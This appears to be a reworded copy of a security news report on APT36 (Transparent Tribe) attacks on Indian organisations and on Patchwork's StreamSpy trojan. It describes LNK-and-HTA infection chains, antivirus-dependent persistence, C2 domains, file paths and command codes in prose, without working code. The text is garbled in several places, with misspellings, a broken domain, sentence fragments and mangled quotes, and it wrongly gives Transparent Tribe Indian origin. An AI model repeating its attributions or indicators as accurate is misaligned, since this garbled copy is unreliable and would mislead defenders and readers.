Threat actors known as Transparent Tribe are believed to have launched new attacks targeting government, academic, and strategic organizations in India using remote access Trojans (RATs) that allow them to take permanent control over compromised hosts.
“The campaign uses deceptive delivery techniques, including weaponized Windows shortcut (LNK) files that disguise as legitimate PDF documents and embed full PDF content to avoid user suspicion,” CYFIRMA said in a technical report.
Transparent Tribe, also known as APT36, is a hacker group known for launching cyber espionage operations against organizations in India. The state-sponsored adversary, believed to be of Indian origin, has been active since at least 2013.
This threat actor boasts an ever-evolving arsenal of RATs to achieve its objectives. Trojans used by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
The latest round of attacks began with spear-phishing emails containing ZIP archives containing LNK files disguised as PDFs. Opening the file triggers the execution of a remote HTML application (HTA) script using ‘mshta.exe’, which decrypts and loads the final RAT payload directly into memory. In parallel, the HTA downloads and opens a decoy PDF document to avoid arousing user suspicions.
“Once the decoding logic is established, the HTA leverages ActiveX objects, specifically WScript.Shell, to interact with the Windows environment,” CYFIRMA said. “This behavior is indicative of environmental profiling and runtime manipulation, techniques to ensure compatibility with the target system and increase reliability of execution commonly observed in malware that exploits ‘mshta.exe’.”
What is notable about this malware is its ability to adapt its persistence method based on the antivirus solution installed on the infected machine.
Once Kapsersky is detected, it creates a working directory under ‘C:\Users\Public\core\’, writes an obfuscated HTA payload to disk, establishes persistence by dropping an LNK file into the Windows startup folder, and then launches the HTA script using ‘mshta.exe’. If Quick Heal is detected, it creates a batch file and a malicious LNK file in the Windows startup folder and writes the HTA payload to disk to establish persistence. If Avast, AVG, or Avira is detected, it works by copying the payload directly to your startup directory and running it. If a recognized antivirus solution is not detected, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment before invoking the batch script.
The second HTA file contains a DLL named “iinneldc.dll” that acts as a full-featured RAT and supports remote system control, file management, data extraction, screenshot capture, clipboard manipulation, and process control.
“APT36 (The Invisible Tribe) remains a highly persistent and strategically driven cyber espionage threat, with a continued focus on intelligence gathering targeting Indian government agencies, educational institutions, and other strategically relevant sectors,” the cybersecurity firm said.
In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (‘NCERT-Whatsapp-Advisory.pdf.lnk’) to deliver a .NET-based loader. This attack drops additional executables and malicious DLLs to perform remote command execution, system reconnaissance, and establish long-term access.
This shortcut is designed to use cmd.exe to run an obfuscated command to retrieve an MSI installer (‘nikmights.msi’) from a remote server (‘aeroclubofindia.co’).[.]in”), is responsible for starting a sequence of actions –
Extract the decoy PDF document and display it to the victim Decode the DLL file and write it to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll” Drop “PcDirvs.exe” in the same location and run it with a 10 second delay Create the registry Visual Basic Create “PcDirvs.hta” containing the script to establish persistence Fixed to launch “PcDirvs.exe” every time after system startup
It is worth pointing out that the lure PDF shown is a legitimate advisory issued by the Pakistan National Cyber Emergency Response Team (PKCERT) in 2024 regarding a fraudulent WhatsApp message campaign targeting government agencies in Pakistan using malicious WinRAR files that infect systems with malware.
The DLL “wininet.dll” connects to the hard-coded command and control (C2) infrastructure hosted at dns.wmiprovider.[.]Com. It was registered in mid-April 2025. The C2 associated with this activity is currently inactive, but due to Windows registry-based persistence, the threat may return at any time in the future.
“The DLL implements multiple HTTP GET-based endpoints to establish communication with the C2 server, perform updates, and retrieve commands issued by the attacker,” CYFIRMA said. “Endpoint characters are intentionally stored in reverse order to avoid static string detection.”
Here is the list of endpoints:
/retsiger (registration), registers the infected system with the C2 server. /taebtraeh (heartbeat), which beacons its presence to the C2 server. /dnammoc_teg (get_command), execute any command via “cmd.exe”. /dnammocmvitna (antivmcommand), queries or sets anti-VM status and adjusts behavior.
The DLL also queries the antivirus products installed on the victim’s system, turning it into a powerful tool that can perform reconnaissance and collect sensitive information.
Patchwork linked to new StreamSpy Trojan
The disclosure comes weeks after a hacker group believed to be of Indian origin called Patchwork (also known as Drop Elephant or Maha Gras) was linked to attacks targeting Pakistan’s defense sector using a Python-based backdoor distributed via phishing emails containing ZIP files, security researcher Idan Talab said.
Inside the archive is an MSBuild project that, when run via “msbuild.exe”, will eventually unpack a dropper to install and launch the Python RAT. The malware has the ability to connect to a C2 server, run remote Python modules, execute commands, and upload/download files.
“This campaign represents a modernized and highly obfuscated Patchwork APT toolkit that blends the MSBuild LOLBin loader, a PyInstaller-modified Python runtime, marshaled bytecode implants, geofencing, and randomized PHP C2 endpoints. [and] It’s a viable persistence mechanism,” Talab said.
As of December 2025, Patchwork is also associated with a previously undocumented Trojan named StreamSpy that uses WebSocket and HTTP protocols for C2 communication. WebSocket channels are used to receive instructions and send execution results, while HTTP is utilized for file transfers.
According to QiAnXin, the link between StreamSpy and Patchwork stems from its similarities to Spyder, another backdoor variant named WarHawk attributed to SideWinder. Patchwork’s use of Spider dates back to 2023.
Distributed via a ZIP archive (‘OPS-VII-SIR.zip’) hosted at ‘firebasescloudemail’.[.]com’, the malware (‘Annexure.exe’) collects system information, establishes persistence via LNK files in the Windows registry, scheduled tasks, or startup folder, and communicates with the C2 server using HTTP and WebSockets. A list of supported commands is below.
F1A5C3, Use ShellExecuteExW to download and open the file. B8C1D2, set the command execution shell to cmd E4F5A6, set the command execution shell to PowerShell FL_SH1, close all shells C9E3D4, E7F8A9, H1K4R8, C0V3RT. Download the encrypted zip file from the C2 server, unzip it, and open it using the following command: ShellExecuteExW F2B3C4, Gather information about the file system and all disks attached to the device D5E6F7, Perform file uploads and downloads A8B9C0, Perform file uploads D1E2F3, Delete files A4B5C6, Rename files D7E8F9, Enumerate specific folders
According to QinAnXin, the StreamSpy download site also hosts a Spyder variant with extensive data collection capabilities, and the malware’s digital signature shows a correlation to another Windows RAT called ShadowAgent, attributed to DoNot Team (also known as Brainworm). Interestingly, the 360 Threat Intelligence Center flagged the same “Annexure.exe” executable as ShadowAgent in November 2025.
“The emergence of the StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is continually iterating its attack tools,” the Chinese security vendor said.
“With the StreamSpy Trojan, the attacker attempts to use a WebSocket channel for issuing commands and feedback of results in order to evade detection and censorship of HTTP traffic. Additionally, correlation samples further confirm that the Maha Grass and DoNot attack groups have some connection in terms of resource sharing.”
Source link
